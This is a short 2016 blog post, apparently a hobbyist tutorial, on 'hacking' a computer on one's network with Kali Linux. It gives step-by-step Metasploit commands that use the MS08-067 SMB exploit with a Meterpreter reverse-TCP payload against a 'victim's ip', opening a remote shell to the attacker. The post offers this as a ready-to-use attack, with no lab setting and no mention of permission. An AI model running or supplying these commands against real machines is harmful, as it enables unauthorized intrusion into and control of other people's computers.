Thursday, 21 July 2016

How to hack a computer on network using kali linux

Picture of Hack a computer on your network with kali linux

Hey guys!
So you want to hack a computer and you've got Kali linux installed?
Then you are on the right place!
I am going to show you how to hack a computer.
Picture of Start Kali Linux

Step 1: Start Kali Linux

    Start Kali Linux and start a new terminal.
Picture of Start the Metasploit console

Step 2: Start the Metasploit console

    Start the Metasploit console by typing: msfconsole
    This will take a few moments...

Step 3: The commands:

So Metasploit started.
Here are the commands you need to type in:
use windows/smb/ms08_067_netapi
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST *Your ip adress* (If you don't know your ip adress then open a new terminal and type ifconfig. your ip adress will be somewhere in the output :D)
set LPORT 4444
set RHOST *victim's ip*
set RPORT 445
exploit
(You should connect)
Type help for a list of commands.

That's it!
You just hacked a computer!
Congrats!
I will probably make more tutorials about hacking and other ways to hack a computer.
So if this didn't work for you, stay tuned!
I think it only works for older versions of windows :(
Also please take a look at my Widows 7 hack tutorial!
>>>

No comments:

Post a Comment